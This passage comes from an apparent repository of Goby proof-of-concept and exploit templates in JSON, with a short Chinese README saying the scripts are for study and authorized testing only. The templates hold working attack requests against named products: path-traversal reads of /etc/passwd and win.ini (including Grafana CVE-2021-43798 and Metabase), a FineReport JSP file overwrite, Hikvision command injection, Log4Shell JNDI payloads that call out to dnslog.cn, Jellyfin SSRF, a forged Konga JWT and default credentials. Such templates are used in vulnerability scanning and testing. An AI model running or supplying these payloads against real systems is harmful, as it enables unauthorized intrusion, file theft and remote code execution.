{ 27 | "method": "GET", 28 | "uri": "/", 29 | "follow_redirect": false, 30 | "header": { 31 | "Authorization": "Basic Z3Vlc3Q6Z3Vlc3Q=" 32 | }, 33 | "data_type": "text", 34 | "data": "", 35 | "set_variable": [] 36 | }, 37 | "ResponseTest": { 38 | "type": "group", 39 | "operation": "AND", 40 | "checks": [ 41 | { 42 | "type": "item", 43 | "variable": "$code", 44 | "operation": "==", 45 | "value": "200", 46 | "bz": "" 47 | }, 48 | { 49 | "type": "item", 50 | "variable": "$body", 51 | "operation": "contains", 52 | "value": "<title>Dubbo Admin</title>", 53 | "bz": "" 54 | }, 55 | { 56 | "type": "item", 57 | "variable": "$body", 58 | "operation": "contains", 59 | "value": "/sysinfo/versions", 60 | "bz": "" 61 | } 62 | ] 63 | }, 64 | "SetVariable": [ 65 | "output|lastbody|regex|" 66 | ] 67 | }, 68 | { 69 | "Request": { 70 | "method": "GET", 71 | "uri": "/", 72 | "follow_redirect": false, 73 | "header": { 74 | "Authorization": "Basic cm9vdDpyb290" 75 | }, 76 | "data_type": "text", 77 | "data": "", 78 | "set_variable": [] 79 | }, 80 | "ResponseTest": { 81 | "type": "group", 82 | "operation": "AND", 83 | "checks": [ 84 | { 85 | "type": "item", 86 | "variable": "$code", 87 | "operation": "==", 88 | "value": "200", 89 | "bz": "" 90 | }, 91 | { 92 | "type": "item", 93 | "variable": "$body", 94 | "operation": "contains", 95 | "value": "<title>Dubbo Admin</title>", 96 | "bz": "" 97 | }, 98 | { 99 | "type": "item", 100 | "variable": "$body", 101 | "operation": "contains", 102 | "value": "/sysinfo/versions", 103 | "bz": "" 104 | } 105 | ] 106 | }, 107 | "SetVariable": [ 108 | "output|lastbody|regex|" 109 | ] 110 | } 111 | ], 112 | "PostTime": "2021-11-28 13:12:18", 113 | "GobyVersion": "1.9.310" 114 | } -------------------------------------------------------------------------------- /Fastmeeting_Arbitrary_File_Read.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "好视通云会议存在任意文件读取漏洞", 3 | "Level": "2", 4 | "Tags": [ 5 | 
"fileread" 6 | ], 7 | "GobyQuery": "body=\"深圳银澎云计算有限公司\"", 8 | "Description": "好视通云会议存在任意文件读取漏洞", 9 | "Product": "好视通云会议", 10 | "Homepage": "https://www.hst.com/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://mp.weixin.qq.com/s/fMNE1PF5n81O1BpoDRlYkA" 16 | ], 17 | "HasExp": true, 18 | "ExpParams": [ 19 | { 20 | "Name": "Filepath", 21 | "Type": "input", 22 | "Value": "../../../../../../../../../../../../../../windows/win.ini" 23 | } 24 | ], 25 | "ExpTips": { 26 | "Type": "", 27 | "Content": "" 28 | }, 29 | "ScanSteps": [ 30 | "AND", 31 | { 32 | "Request": { 33 | "method": "GET", 34 | "uri": "/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini", 35 | "follow_redirect": false, 36 | "header": null, 37 | "data_type": "text", 38 | "data": "", 39 | "set_variable": [] 40 | }, 41 | "ResponseTest": { 42 | "type": "group", 43 | "operation": "AND", 44 | "checks": [ 45 | { 46 | "type": "item", 47 | "variable": "$code", 48 | "operation": "==", 49 | "value": "200", 50 | "bz": "" 51 | }, 52 | { 53 | "type": "item", 54 | "variable": "$body", 55 | "operation": "contains", 56 | "value": "[fonts]", 57 | "bz": "" 58 | }, 59 | { 60 | "type": "item", 61 | "variable": "$body", 62 | "operation": "contains", 63 | "value": "[extensions]", 64 | "bz": "" 65 | } 66 | ] 67 | }, 68 | "SetVariable": [ 69 | "output|lastbody|regex|" 70 | ] 71 | } 72 | ], 73 | "ExploitSteps": [ 74 | "AND", 75 | { 76 | "Request": { 77 | "method": "GET", 78 | "uri": "/register/toDownload.do?fileName={{{Filepath}}}", 79 | "follow_redirect": false, 80 | "header": null, 81 | "data_type": "text", 82 | "data": "", 83 | "set_variable": [] 84 | }, 85 | "ResponseTest": { 86 | "type": "group", 87 | "operation": "AND", 88 | "checks": [ 89 | { 90 | "type": "item", 91 | "variable": "$code", 92 | "operation": "==", 93 | "value": "200", 94 | "bz": "" 95 | } 96 | ] 97 | }, 98 | "SetVariable": [ 99 | "output|lastbody||" 100 | ] 101 | } 
102 | ], 103 | "PostTime": "2021-12-11 14:50:39", 104 | "GobyVersion": "1.9.310" 105 | } -------------------------------------------------------------------------------- /FineReport_v9_Arbitrary_File_Overwrite.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "FineReport v9 Arbitrary File Overwrite", 3 | "Level": "3", 4 | "Tags": [ 5 | "overwrite" 6 | ], 7 | "GobyQuery": "app=\"fanruansem-FineReport\"", 8 | "Description": "由于在初始化svg文件时,未对传入的参数做限制,导致可以对已存在的文件覆盖写入数据,从而通过将木马写入jsp文件中获取服务器权限", 9 | "Product": "帆软-FineReport", 10 | "Homepage": "https://www.fanruan.com/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://github.com/NHPT/WebReportV9Exp/blob/main/WebReport_Exp.py" 16 | ], 17 | "HasExp": false, 18 | "ExpParams": null, 19 | "ExpTips": { 20 | "Type": "", 21 | "Content": "" 22 | }, 23 | "ScanSteps": [ 24 | "AND", 25 | { 26 | "Request": { 27 | "method": "POST", 28 | "uri": "/WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/a.svg.jsp", 29 | "follow_redirect": false, 30 | "header": { 31 | "Content-Type": "application/json" 32 | }, 33 | "data_type": "text", 34 | "data": "{\"__CONTENT__\":{{{str1}}},\"__CHARSET__\":\"UTF-8\"}", 35 | "set_variable": [ 36 | "str1|rand|str|7" 37 | ] 38 | }, 39 | "ResponseTest": { 40 | "type": "group", 41 | "operation": "AND", 42 | "checks": [ 43 | { 44 | "type": "item", 45 | "variable": "$code", 46 | "operation": "==", 47 | "value": "200", 48 | "bz": "" 49 | } 50 | ] 51 | }, 52 | "SetVariable": [ 53 | "output|lastbody|regex|" 54 | ] 55 | }, 56 | { 57 | "Request": { 58 | "method": "GET", 59 | "uri": "/WebReport/a.svg.jsp", 60 | "follow_redirect": false, 61 | "header": null, 62 | "data_type": "text", 63 | "data": "", 64 | "set_variable": [] 65 | }, 66 | "ResponseTest": { 67 | "type": "group", 68 | "operation": "AND", 69 | "checks": [ 70 | { 71 | "type": "item", 72 | "variable": 
"$code", 73 | "operation": "==", 74 | "value": "200", 75 | "bz": "" 76 | }, 77 | { 78 | "type": "item", 79 | "variable": "$body", 80 | "operation": "contains", 81 | "value": "{{{str1}}}", 82 | "bz": "" 83 | } 84 | ] 85 | }, 86 | "SetVariable": [ 87 | "output|lastbody|regex|" 88 | ] 89 | } 90 | ], 91 | "PostTime": "2021-12-08 11:22:44", 92 | "GobyVersion": "1.9.310" 93 | } -------------------------------------------------------------------------------- /Grafana_Plugins_Arbitrary_File_Read.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Grafana Plugins Arbitrary File Read CVE-2021-43798", 3 | "Level": "3", 4 | "Tags": [ 5 | "fileread" 6 | ], 7 | "GobyQuery": "( app=\"Grafana\" | title==\"Grafana\" )", 8 | "Description": "Grafana是用于可视化大型测量数据的开源程序,他提供了强大和优雅的方式去创建、共享、浏览数据。dashboard中显示了你不同metric数据源中的数据。通过默认存在的插件,可构造特殊的请求包读取服务器任意文件。", 9 | "Product": "Grafana", 10 | "Homepage": "https://grafana.com/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://mp.weixin.qq.com/s/DTkVTtbndaMWL9WGzaI32A" 16 | ], 17 | "HasExp": true, 18 | "ExpParams": [ 19 | { 20 | "Name": "Path", 21 | "Type": "input", 22 | "Value": "../../../../../../../../../etc/passwd" 23 | } 24 | ], 25 | "ExpTips": { 26 | "Type": "", 27 | "Content": "" 28 | }, 29 | "ScanSteps": [ 30 | "AND", 31 | { 32 | "Request": { 33 | "method": "GET", 34 | "uri": "/public/plugins/welcome/../../../../../../../../../etc/passwd", 35 | "follow_redirect": false, 36 | "header": null, 37 | "data_type": "text", 38 | "data": "", 39 | "set_variable": [] 40 | }, 41 | "ResponseTest": { 42 | "type": "group", 43 | "operation": "AND", 44 | "checks": [ 45 | { 46 | "type": "item", 47 | "variable": "$code", 48 | "operation": "==", 49 | "value": "200", 50 | "bz": "" 51 | }, 52 | { 53 | "type": "item", 54 | "variable": "$body", 55 | "operation": "contains", 56 | "value": "root:x:", 57 | "bz": "" 58 | }, 59 | { 60 | "type": "item", 61 | 
"variable": "$body", 62 | "operation": "contains", 63 | "value": "daemon:x:", 64 | "bz": "" 65 | } 66 | ] 67 | }, 68 | "SetVariable": [ 69 | "output|lastbody|regex|" 70 | ] 71 | } 72 | ], 73 | "ExploitSteps": [ 74 | "AND", 75 | { 76 | "Request": { 77 | "method": "GET", 78 | "uri": "/public/plugins/welcome/{{{Path}}}", 79 | "follow_redirect": false, 80 | "header": null, 81 | "data_type": "text", 82 | "data": "", 83 | "set_variable": [] 84 | }, 85 | "ResponseTest": { 86 | "type": "group", 87 | "operation": "AND", 88 | "checks": [ 89 | { 90 | "type": "item", 91 | "variable": "$code", 92 | "operation": "==", 93 | "value": "200", 94 | "bz": "" 95 | } 96 | ] 97 | }, 98 | "SetVariable": [ 99 | "output|lastbody||" 100 | ] 101 | } 102 | ], 103 | "PostTime": "2021-12-08 13:56:21", 104 | "GobyVersion": "1.9.310" 105 | } -------------------------------------------------------------------------------- /Hikvision_RCE_CVE_2021_36260.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Hikvision RCE CVE-2021-36260", 3 | "Level": "3", 4 | "Tags": [ 5 | "rce" 6 | ], 7 | "GobyQuery": "app=\"Hikvision-Cameras-and-Surveillance\"", 8 | "Description": "攻击者利用该漏洞可以用无限制的root shell来完全控制设备,即使设备的所有者受限于有限的受保护shell(psh)。除了入侵IP摄像头外,还可以访问和攻击内部网络。\n该漏洞的利用并不需要用户交互,攻击者只需要访问http或HTTPS服务器端口(80/443)即可利用该漏洞,无需用户名、密码、以及其他操作。摄像头本身也不会检测到任何登录信息。", 9 | "Product": "hikvision", 10 | "Homepage": "https://www.hikvision.com/cn/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html" 16 | ], 17 | "HasExp": false, 18 | "ExpParams": null, 19 | "ExpTips": { 20 | "Type": "", 21 | "Content": "" 22 | }, 23 | "ScanSteps": [ 24 | "AND", 25 | { 26 | "Request": { 27 | "method": "GET", 28 | "uri": "/", 29 | "follow_redirect": false, 30 | "header": null, 31 | "data_type": "text", 32 | "data": "", 33 | "set_variable": [] 34 | }, 35 | 
"ResponseTest": { 36 | "type": "group", 37 | "operation": "AND", 38 | "checks": [ 39 | { 40 | "type": "item", 41 | "variable": "$code", 42 | "operation": "==", 43 | "value": "200", 44 | "bz": "" 45 | } 46 | ] 47 | }, 48 | "SetVariable": [ 49 | "output|lastheader|regex|" 50 | ] 51 | }, 52 | { 53 | "Request": { 54 | "method": "PUT", 55 | "uri": "/SDK/webLanguage", 56 | "follow_redirect": false, 57 | "header": { 58 | "X-Requested-With": "XMLHttpRequest", 59 | "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8" 60 | }, 61 | "data_type": "text", 62 | "data": "\n$(ls -l >webLib/c)", 63 | "set_variable": [] 64 | }, 65 | "ResponseTest": { 66 | "type": "group", 67 | "operation": "AND", 68 | "checks": [ 69 | { 70 | "type": "item", 71 | "variable": "$code", 72 | "operation": "==", 73 | "value": "500", 74 | "bz": "" 75 | } 76 | ] 77 | }, 78 | "SetVariable": [ 79 | "output|lastbody|regex|" 80 | ] 81 | }, 82 | { 83 | "Request": { 84 | "method": "GET", 85 | "uri": "/c", 86 | "follow_redirect": false, 87 | "header": null, 88 | "data_type": "text", 89 | "data": "", 90 | "set_variable": [] 91 | }, 92 | "ResponseTest": { 93 | "type": "group", 94 | "operation": "AND", 95 | "checks": [ 96 | { 97 | "type": "item", 98 | "variable": "$code", 99 | "operation": "==", 100 | "value": "200", 101 | "bz": "" 102 | } 103 | ] 104 | }, 105 | "SetVariable": [ 106 | "output|lastbody||" 107 | ] 108 | } 109 | ], 110 | "PostTime": "2021-11-17 13:28:08", 111 | "GobyVersion": "1.8.302" 112 | } -------------------------------------------------------------------------------- /Jellyfin_SSRF_CVE_2021_29490.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Jellyfin SSRF CVE-2021-29490", 3 | "Level": "3", 4 | "Tags": [ 5 | "ssrf" 6 | ], 7 | "GobyQuery": "title==\"Jellyfin\"", 8 | "Description": "A Server-Side Request Forgery (SSRF) flaw was found in mod_proxy of httpd. 
This flaw allows a remote, unauthenticated attacker to make the httpd server forward requests to an arbitrary server. The attacker could get, modify, or delete resources on other services that may be behind a firewall and inaccessible otherwise. The impact of this flaw varies based on what services and resources are available on the httpd network.", 9 | "Product": "Jellyfin", 10 | "Homepage": "https://jellyfin.org/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://mp.weixin.qq.com/s?__biz=MzkwNDI1NDUwMQ==&mid=2247485439&idx=3&sn=4bd6fc982541ca3ec610856c37a36c14" 16 | ], 17 | "HasExp": true, 18 | "ExpParams": null, 19 | "ExpTips": { 20 | "Type": "", 21 | "Content": "" 22 | }, 23 | "ScanSteps": [ 24 | "OR", 25 | { 26 | "Request": { 27 | "method": "GET", 28 | "uri": "/Images/Remote?imageUrl=http://{{{check}}}", 29 | "follow_redirect": false, 30 | "header": null, 31 | "data_type": "text", 32 | "data": "", 33 | "set_variable": [ 34 | "check|dnslog|4|15" 35 | ] 36 | }, 37 | "ResponseTest": { 38 | "type": "group", 39 | "operation": "AND", 40 | "checks": [ 41 | { 42 | "type": "item", 43 | "variable": "$code", 44 | "operation": "==", 45 | "value": "200", 46 | "bz": "" 47 | }, 48 | { 49 | "type": "item", 50 | "variable": "$dns", 51 | "operation": "contains", 52 | "value": "{{{check}}}", 53 | "bz": "" 54 | } 55 | ] 56 | }, 57 | "SetVariable": [ 58 | "output|lastbody|regex|" 59 | ] 60 | }, 61 | { 62 | "Request": { 63 | "method": "GET", 64 | "uri": "/Images/Remote?imageUrl=http://www.baidu.com", 65 | "follow_redirect": false, 66 | "header": null, 67 | "data_type": "text", 68 | "data": "", 69 | "set_variable": [] 70 | }, 71 | "ResponseTest": { 72 | "type": "group", 73 | "operation": "AND", 74 | "checks": [ 75 | { 76 | "type": "item", 77 | "variable": "$code", 78 | "operation": "==", 79 | "value": "200", 80 | "bz": "" 81 | }, 82 | { 83 | "type": "item", 84 | "variable": "$body", 85 | "operation": "contains", 86 | "value": 
"百度", 87 | "bz": "" 88 | } 89 | ] 90 | }, 91 | "SetVariable": [ 92 | "output|lastbody|regex|" 93 | ] 94 | } 95 | ], 96 | "ExploitSteps": [ 97 | "AND", 98 | { 99 | "Request": { 100 | "method": "GET", 101 | "uri": "/test.php", 102 | "follow_redirect": true, 103 | "header": null, 104 | "data_type": "text", 105 | "data": "", 106 | "set_variable": [] 107 | }, 108 | "ResponseTest": { 109 | "type": "group", 110 | "operation": "AND", 111 | "checks": [ 112 | { 113 | "type": "item", 114 | "variable": "$code", 115 | "operation": "==", 116 | "value": "200", 117 | "bz": "" 118 | }, 119 | { 120 | "type": "item", 121 | "variable": "$body", 122 | "operation": "contains", 123 | "value": "test", 124 | "bz": "" 125 | } 126 | ] 127 | }, 128 | "SetVariable": [ 129 | "output|lastbody|regex|" 130 | ] 131 | } 132 | ], 133 | "PostTime": "2021-12-10 13:58:26", 134 | "GobyVersion": "1.9.310" 135 | } -------------------------------------------------------------------------------- /Konga_Default_JWT_KEY.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Konga Default JWT KEY", 3 | "Level": "3", 4 | "Tags": [ 5 | "defaultaccount" 6 | ], 7 | "GobyQuery": "(title==\"Konga\" | body=\"window.konga_version\")", 8 | "Description": "Konga JWT默认key为oursecret,可伪造任意用户权限。", 9 | "Product": "Konga", 10 | "Homepage": "https://github.com/pantsel/konga", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://mp.weixin.qq.com/s/8guU2hT3wE2puEztdGqZQg" 16 | ], 17 | "HasExp": true, 18 | "ExpParams": null, 19 | "ExpTips": { 20 | "Type": "", 21 | "Content": "" 22 | }, 23 | "ScanSteps": [ 24 | "AND", 25 | { 26 | "Request": { 27 | "method": "GET", 28 | "uri": "/api/user", 29 | "follow_redirect": false, 30 | "header": { 31 | "authorization": "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.MQ.gSssTBEVe6X9aFEd0H_tt8kk2u7df90W1eOzNRnrsQ4" 32 | }, 33 | "data_type": "text", 34 | "data": "", 35 | "set_variable": [] 36 | 
}, 37 | "ResponseTest": { 38 | "type": "group", 39 | "operation": "AND", 40 | "checks": [ 41 | { 42 | "type": "item", 43 | "variable": "$code", 44 | "operation": "==", 45 | "value": "200", 46 | "bz": "" 47 | }, 48 | { 49 | "type": "item", 50 | "variable": "$body", 51 | "operation": "contains", 52 | "value": "createdUser", 53 | "bz": "" 54 | }, 55 | { 56 | "type": "item", 57 | "variable": "$body", 58 | "operation": "contains", 59 | "value": "username", 60 | "bz": "" 61 | } 62 | ] 63 | }, 64 | "SetVariable": [ 65 | "output|lastbody||" 66 | ] 67 | } 68 | ], 69 | "ExploitSteps": [ 70 | "AND", 71 | { 72 | "Request": { 73 | "method": "GET", 74 | "uri": "/api/user", 75 | "follow_redirect": false, 76 | "header": { 77 | "authorization": "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.MQ.gSssTBEVe6X9aFEd0H_tt8kk2u7df90W1eOzNRnrsQ4" 78 | }, 79 | "data_type": "text", 80 | "data": "", 81 | "set_variable": [] 82 | }, 83 | "ResponseTest": { 84 | "type": "group", 85 | "operation": "AND", 86 | "checks": [ 87 | { 88 | "type": "item", 89 | "variable": "$code", 90 | "operation": "==", 91 | "value": "200", 92 | "bz": "" 93 | }, 94 | { 95 | "type": "item", 96 | "variable": "$body", 97 | "operation": "contains", 98 | "value": "createdUser", 99 | "bz": "" 100 | }, 101 | { 102 | "type": "item", 103 | "variable": "$body", 104 | "operation": "contains", 105 | "value": "username", 106 | "bz": "" 107 | } 108 | ] 109 | }, 110 | "SetVariable": [ 111 | "output|lastbody||" 112 | ] 113 | } 114 | ], 115 | "PostTime": "2021-12-03 18:50:39", 116 | "GobyVersion": "1.9.310" 117 | } -------------------------------------------------------------------------------- /Metabase_Geojson_Arbitrary_File_Read_CVE_2021_41277.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Metabase Geojson Arbitrary File Read CVE-2021-41277", 3 | "Level": "3", 4 | "Tags": [ 5 | "fileread" 6 | ], 7 | "GobyQuery": "(app=\"Metabase\" | title=\"Metabase\" | body=\"Metabase\")", 8 | 
"Description": "Metabase is an open source data analytics platform. In affected versions a security issue has been discovered with the custom GeoJSON map (`admin->settings->maps->custom maps->add a map`) support and potential local file inclusion (including environment variables). URLs were not validated prior to being loaded. This issue is fixed in a new maintenance release (0.40.5 and 1.40.5), and any subsequent release after that. If you’re unable to upgrade immediately, you can mitigate this by including rules in your reverse proxy or load balancer or WAF to provide a validation filter before the application.", 9 | "Product": "Metabase", 10 | "Homepage": "https://www.metabase.com/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247486238&idx=1&sn=0eea83880942b16975335739e1db5aa2" 16 | ], 17 | "HasExp": true, 18 | "ExpParams": [ 19 | { 20 | "Name": "Path", 21 | "Type": "input", 22 | "Value": "/etc/passwd" 23 | } 24 | ], 25 | "ExpTips": { 26 | "Type": "", 27 | "Content": "" 28 | }, 29 | "ScanSteps": [ 30 | "AND", 31 | { 32 | "Request": { 33 | "method": "GET", 34 | "uri": "/api/geojson?url=file:/etc/passwd", 35 | "follow_redirect": false, 36 | "header": null, 37 | "data_type": "text", 38 | "data": "", 39 | "set_variable": [] 40 | }, 41 | "ResponseTest": { 42 | "type": "group", 43 | "operation": "AND", 44 | "checks": [ 45 | { 46 | "type": "item", 47 | "variable": "$code", 48 | "operation": "==", 49 | "value": "200", 50 | "bz": "" 51 | }, 52 | { 53 | "type": "item", 54 | "variable": "$body", 55 | "operation": "contains", 56 | "value": "/root:/bin/ash", 57 | "bz": "" 58 | } 59 | ] 60 | }, 61 | "SetVariable": [ 62 | "output|lastbody||" 63 | ] 64 | } 65 | ], 66 | "ExploitSteps": [ 67 | "AND", 68 | { 69 | "Request": { 70 | "method": "GET", 71 | "uri": "/api/geojson?url=file:{{{Path}}}", 72 | "follow_redirect": false, 73 | "header": null, 74 | "data_type": "text", 
75 | "data": "", 76 | "set_variable": [] 77 | }, 78 | "ResponseTest": { 79 | "type": "group", 80 | "operation": "AND", 81 | "checks": [ 82 | { 83 | "type": "item", 84 | "variable": "$code", 85 | "operation": "==", 86 | "value": "200", 87 | "bz": "" 88 | } 89 | ] 90 | }, 91 | "SetVariable": [ 92 | "output|lastbody||" 93 | ] 94 | } 95 | ], 96 | "PostTime": "2021-11-21 15:03:56", 97 | "GobyVersion": "1.8.302" 98 | } -------------------------------------------------------------------------------- /MobileIron_Log4shell_CVE_2021_44228.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "MobileIron Log4shell CVE-2021-44228", 3 | "Level": "3", 4 | "Tags": [ 5 | "rce" 6 | ], 7 | "GobyQuery": "( title=\"MobileIron System Manager: Sign In\" | title=\"MobileIron User Portal: Sign In\" | title=\"MobileIron Benutzerportal: Anmeldung\" | title=\"MobileIron 用户门户:登录\" | title=\"MobileIron Portail utilisateur : connexion\")", 8 | "Description": "MobileIron存在log4j漏洞。", 9 | "Product": "MobileIron", 10 | "Homepage": "https://www.mobileiron.com/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis" 16 | ], 17 | "HasExp": true, 18 | "ExpParams": [ 19 | { 20 | "Name": "cmd", 21 | "Type": "input", 22 | "Value": "${jndi:ldap://dns.log/tea}" 23 | } 24 | ], 25 | "ExpTips": { 26 | "Type": "", 27 | "Content": "" 28 | }, 29 | "ScanSteps": [ 30 | "AND", 31 | { 32 | "Request": { 33 | "method": "GET", 34 | "uri": "http://www.dnslog.cn/getdomain.php", 35 | "follow_redirect": false, 36 | "header": null, 37 | "data_type": "text", 38 | "data": "", 39 | "set_variable": [] 40 | }, 41 | "ResponseTest": { 42 | "type": "group", 43 | "operation": "AND", 44 | "checks": [ 45 | { 46 | "type": "item", 47 | "variable": "$code", 48 | "operation": "==", 49 | "value": "200", 50 | "bz": "" 51 | } 52 | ] 53 | }, 54 | "SetVariable": [ 55 | 
"dnstest|lastbody||" 56 | ] 57 | }, 58 | { 59 | "Request": { 60 | "method": "POST", 61 | "uri": "/mics/j_spring_security_check", 62 | "follow_redirect": false, 63 | "header": { 64 | "Content-Type": "application/x-www-form-urlencoded" 65 | }, 66 | "data_type": "text", 67 | "data": "j_username=${jndi:ldap://{{{dnstest}}}/tea}&j_password=${jndi:ldap://{{{dnstest}}}/tea}", 68 | "set_variable": [] 69 | }, 70 | "ResponseTest": { 71 | "type": "group", 72 | "operation": "AND", 73 | "checks": [] 74 | }, 75 | "SetVariable": [ 76 | "output|lastbody|regex|" 77 | ] 78 | }, 79 | { 80 | "Request": { 81 | "method": "GET", 82 | "uri": "http://www.dnslog.cn/getrecords.php", 83 | "follow_redirect": false, 84 | "header": null, 85 | "data_type": "text", 86 | "data": "", 87 | "set_variable": [] 88 | }, 89 | "ResponseTest": { 90 | "type": "group", 91 | "operation": "AND", 92 | "checks": [ 93 | { 94 | "type": "item", 95 | "variable": "$code", 96 | "operation": "==", 97 | "value": "200", 98 | "bz": "" 99 | }, 100 | { 101 | "type": "item", 102 | "variable": "$body", 103 | "operation": "contains", 104 | "value": "{{{dnstest}}}", 105 | "bz": "" 106 | } 107 | ] 108 | }, 109 | "SetVariable": [ 110 | "output|lastbody|regex|" 111 | ] 112 | } 113 | ], 114 | "ExploitSteps": [ 115 | "AND", 116 | { 117 | "Request": { 118 | "method": "POST", 119 | "uri": "/mics/j_spring_security_check", 120 | "follow_redirect": false, 121 | "header": { 122 | "Content-Type": "application/x-www-form-urlencoded" 123 | }, 124 | "data_type": "text", 125 | "data": "j_username={{{cmd}}}&j_password={{{cmd}}}", 126 | "set_variable": [] 127 | }, 128 | "ResponseTest": { 129 | "type": "group", 130 | "operation": "AND", 131 | "checks": [] 132 | }, 133 | "SetVariable": [ 134 | "output|lastbody|regex|" 135 | ] 136 | } 137 | ], 138 | "PostTime": "2022-01-10 13:53:47", 139 | "GobyVersion": "1.9.320" 140 | } -------------------------------------------------------------------------------- /Node_RED_ui_base_Arbitrary_File_Read.json: 
-------------------------------------------------------------------------------- 1 | { 2 | "Name": "Node-RED ui_base Arbitrary File Read", 3 | "Level": "2", 4 | "Tags": [ 5 | "fileread" 6 | ], 7 | "GobyQuery": "title=\"Node-RED\"", 8 | "Description": "Node-RED 在/nodes/ui_base.js中,URL与'/ui_base/js/*'匹配,然后传递给path.join,\n缺乏对最终路径的验证会导致路径遍历漏洞,可以利用这个漏洞读取服务器上的敏感数据,比如settings.js.", 9 | "Product": "Node-RED", 10 | "Homepage": "https://nodered.org/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://mp.weixin.qq.com/s/KRGKXAJQawXl88RBPTaAeg" 16 | ], 17 | "HasExp": true, 18 | "ExpParams": null, 19 | "ExpTips": { 20 | "Type": "", 21 | "Content": "" 22 | }, 23 | "ScanSteps": [ 24 | "AND", 25 | { 26 | "Request": { 27 | "method": "GET", 28 | "uri": "/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd", 29 | "follow_redirect": false, 30 | "header": null, 31 | "data_type": "text", 32 | "data": "", 33 | "set_variable": [] 34 | }, 35 | "ResponseTest": { 36 | "type": "group", 37 | "operation": "AND", 38 | "checks": [ 39 | { 40 | "type": "item", 41 | "variable": "$code", 42 | "operation": "==", 43 | "value": "200", 44 | "bz": "" 45 | }, 46 | { 47 | "type": "item", 48 | "variable": "$body", 49 | "operation": "contains", 50 | "value": "root:x:", 51 | "bz": "" 52 | }, 53 | { 54 | "type": "item", 55 | "variable": "$body", 56 | "operation": "contains", 57 | "value": "bin:x:", 58 | "bz": "" 59 | } 60 | ] 61 | }, 62 | "SetVariable": [ 63 | "output|lastbody|regex|" 64 | ] 65 | } 66 | ], 67 | "ExploitSteps": [ 68 | "AND", 69 | { 70 | "Request": { 71 | "method": "GET", 72 | "uri": "/ui_base/js/..%2f..%2f..%2f..%2fsettings.js", 73 | "follow_redirect": false, 74 | "header": null, 75 | "data_type": "text", 76 | "data": "", 77 | "set_variable": [] 78 | }, 79 | "ResponseTest": { 80 | "type": "group", 81 | "operation": "AND", 82 | "checks": [ 83 | { 84 | "type": "item", 85 | "variable": "$code", 86 | "operation": "==", 87 
| "value": "200", 88 | "bz": "" 89 | }, 90 | { 91 | "type": "item", 92 | "variable": "$body", 93 | "operation": "contains", 94 | "value": "username", 95 | "bz": "" 96 | }, 97 | { 98 | "type": "item", 99 | "variable": "$body", 100 | "operation": "contains", 101 | "value": "password", 102 | "bz": "" 103 | } 104 | ] 105 | }, 106 | "SetVariable": [ 107 | "output|lastbody||" 108 | ] 109 | } 110 | ], 111 | "PostTime": "2021-12-05 16:31:16", 112 | "GobyVersion": "1.9.310" 113 | } -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # 声明 2 | 本程序仅供学习交流,请使用者遵守《中华人民共和国网络安全法》,勿将此脚本用于非授权的测试,脚本开发者不负任何连带法律责任。 3 | ### 0x001 4 | goby用起来还是蛮方便的,网上公开的poc太少,区别于已公开的列表,打算一日一更吧(理想状态) 5 | 6 | (如果你没有红队版,赶紧使用!) 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /Security_Devices_Hardcoded_Password.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Security Devices Hardcoded Password", 3 | "Level": "2", 4 | "Tags": [ 5 | "infoleak" 6 | ], 7 | "GobyQuery": "body=\"var dkey_verify = Get_Verify_Info(hex_md5)\"", 8 | "Description": "中科网威、网域科技、锐捷、天工网络等防火墙web管理程序存在硬编码漏洞。", 9 | "Product": "多个", 10 | "Homepage": "无", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://mp.weixin.qq.com/s/59-rkZUWZNtJVgIbpULnxw" 16 | ], 17 | "HasExp": true, 18 | "ExpParams": null, 19 | "ExpTips": { 20 | "Type": "", 21 | "Content": "" 22 | }, 23 | "ScanSteps": [ 24 | "AND", 25 | { 26 | "Request": { 27 | "method": "GET", 28 | "uri": "/", 29 | "follow_redirect": false, 30 | "header": null, 31 | "data_type": "text", 32 | "data": "", 33 | "set_variable": [] 34 | }, 35 | "ResponseTest": { 36 | "type": "group", 37 | "operation": "AND", 38 | "checks": [ 39 | { 40 | "type": "item", 41 | "variable": "$code", 42 | "operation": 
